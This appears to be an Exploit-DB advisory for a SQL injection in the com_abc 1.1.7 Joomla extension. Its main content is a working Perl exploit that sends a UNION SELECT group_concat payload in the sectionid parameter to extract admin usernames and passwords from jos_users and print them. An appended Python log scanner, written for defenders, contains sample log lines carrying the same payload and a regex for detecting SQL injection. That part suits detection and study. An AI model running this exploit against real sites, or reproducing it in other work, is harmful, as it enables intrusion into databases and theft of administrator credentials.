Vendor: com_abc
By: AntiSecurity
CVSS: 8.8 (HIGH)
CWE: 89 (SQL Injection)
Product Name: com_abc
Affected Version From: 1.1.7
Affected Version To: 1.1.7
Patch Exists: NO
Related CWE: N/A
CPE: a:airiny:com_abc
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
Date: 2010

ABC Joomla Extension SQL Injection Exploit

The ABC Joomla extension (com_abc 1.1.7) is vulnerable to SQL injection: the sectionid parameter of the index.php?option=com_abc view is passed into a SQL query without validation. An attacker can exploit this by sending a crafted HTTP request that carries a malicious SQL fragment in that parameter, which can expose the admin account credentials and other sensitive information stored in the database.

Mitigation:

The application should use parameterized queries, and validate that numeric parameters such as sectionid are integers before use, to prevent SQL injection attacks.

Exploit-DB raw data:

#!/usr/bin/perl

#***********************************************************************#
#                                                                       #
# [o] ABC Joomla Extension SQL Injection Exploit                        #
#      Software : com_abc version 1.1.7                                 #
#      Vendor   : http://www.airiny.com/                                #
#      Author   : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ] #
#      Contact  : public[at]antisecurity[dot]org                        #
#      Home     : http://antisecurity.org/                              #
#                                                                       #
# [o] Usage                                                             #
#      root@evilc0de:~# perl abc.pl www.target.com                      #
#                                                                       #
# [o] Greetz                                                            #
#      Angela Zhang stardustmemory aJe martfella pizzyroot Genex        #
#      H312Y yooogy mousekill }^-^{ noname matthews wishnusakti         #
#      skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke kaka11             #
#                                                                       #
# [o] April 27 2010 - GMT +07:00 Jakarta, Indonesia                     #
#                                                                       #
#***********************************************************************#

use strict;
use warnings;
use HTTP::Request;
use LWP::UserAgent;

my $target    = $ARGV[0];
my $file_vuln = '/index.php?option=com_abc&view=abc&letter=AS&sectionid=';
my $sql_query = '-null+union+select+1,group_concat(0x3a,username,0x3a,password,0x3a)+from+jos_users--';

print "\n[x]===============================================[x]\n";
print "[x]  ABC Joomla Extension SQL Injection Exploit   [x]\n";
print "[x]            [C]oded By AntiSecurity            [x]\n";
print "[x]===============================================[x]\n\n";

# Request URL: target host, vulnerable view, injected sectionid value
my $exploit = "http://" . $target . $file_vuln . $sql_query;

my $request   = HTTP::Request->new(GET => $exploit);
my $useragent = LWP::UserAgent->new();
$useragent->timeout(10);
my $response  = $useragent->request($request);

if ($response->is_success) {
    my $res = $response->content;
    # group_concat wraps each row as :username:password:
    if ($res =~ m/:(.*):(.*):/g) {
        my ($username, $password) = ($1, $2);
        print "[+] $username:$password \n\n";
    }
    else { print "[-] Error, Fail to get admin login.\n\n"; }
}
else { print "[-] Error, " . $response->status_line . "\n\n"; }
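As an added defender-side example (not part of the original advisory or the exploit above), the following Python scanner walks web-server access logs and flags com_abc requests whose sectionid is not the integer the component expects, using the request path from the exploit. The log lines are constructed samples; the field layout assumed is Apache combined format.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Apache combined-format log lines for illustration, not real traffic.
# Line 2 carries the request the exploit above sends; line 4 a percent-encoded variant.
SAMPLE_LOG = """\
203.0.113.7 - - [27/Apr/2010:10:01:02 +0700] "GET /index.php?option=com_abc&view=abc&letter=AS&sectionid=3 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [27/Apr/2010:10:01:05 +0700] "GET /index.php?option=com_abc&view=abc&letter=AS&sectionid=-null+union+select+1,group_concat(0x3a,username,0x3a,password,0x3a)+from+jos_users-- HTTP/1.1" 200 6011 "-" "libwww-perl/5.834"
203.0.113.9 - - [27/Apr/2010:10:01:07 +0700] "GET /index.php?option=com_content&view=article&id=12 HTTP/1.1" 200 8000 "-" "Mozilla/5.0"
203.0.113.11 - - [27/Apr/2010:10:02:00 +0700] "GET /index.php?option=com_abc&view=abc&letter=AS&sectionid=7%20UNION%20SELECT%201,2-- HTTP/1.1" 500 300 "-" "curl/7.19.7"
198.51.100.4 - - [27/Apr/2010:10:02:30 +0700] "GET /index.php?option=com_abc&view=abc&letter=AS&sectionid=3a HTTP/1.1" 404 210 "-" "Mozilla/5.0"
"""

# Apache combined format: client, identd, user, [timestamp], "request", status, bytes, "referer", "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
# SQL keywords, comment terminators and hex literals of the kind used in the payload above.
SQLI_RE = re.compile(r'\b(union|select|concat|from)\b|--|/\*|0x[0-9a-f]+', re.IGNORECASE)


def flag_com_abc_requests(log_text):
    """Return (ip, timestamp, decoded sectionid, reason) for each suspicious com_abc request.

    sectionid is a numeric row id, so any non-integer value is malformed; SQL tokens
    inside it mark the request as an injection attempt rather than a typo.
    """
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        params = parse_qs(urlsplit(m.group('path')).query, keep_blank_values=True)
        if params.get('option', [''])[0] != 'com_abc' or 'sectionid' not in params:
            continue
        sid = params['sectionid'][0]  # parse_qs already percent- and plus-decodes
        if sid.lstrip('-').isdigit():
            continue  # well-formed integer id, nothing to report
        reason = 'sql_tokens' if SQLI_RE.search(sid) else 'non_integer'
        hits.append((m.group('ip'), m.group('ts'), sid, reason))
    return hits


if __name__ == '__main__':
    for ip, ts, sid, reason in flag_com_abc_requests(SAMPLE_LOG):
        print(f'{ts} {ip} sectionid={sid!r} -> {reason}')
```

Pipe a real access log into flag_com_abc_requests to retro-hunt for this request pattern; the same integer check applies on the server side as input validation.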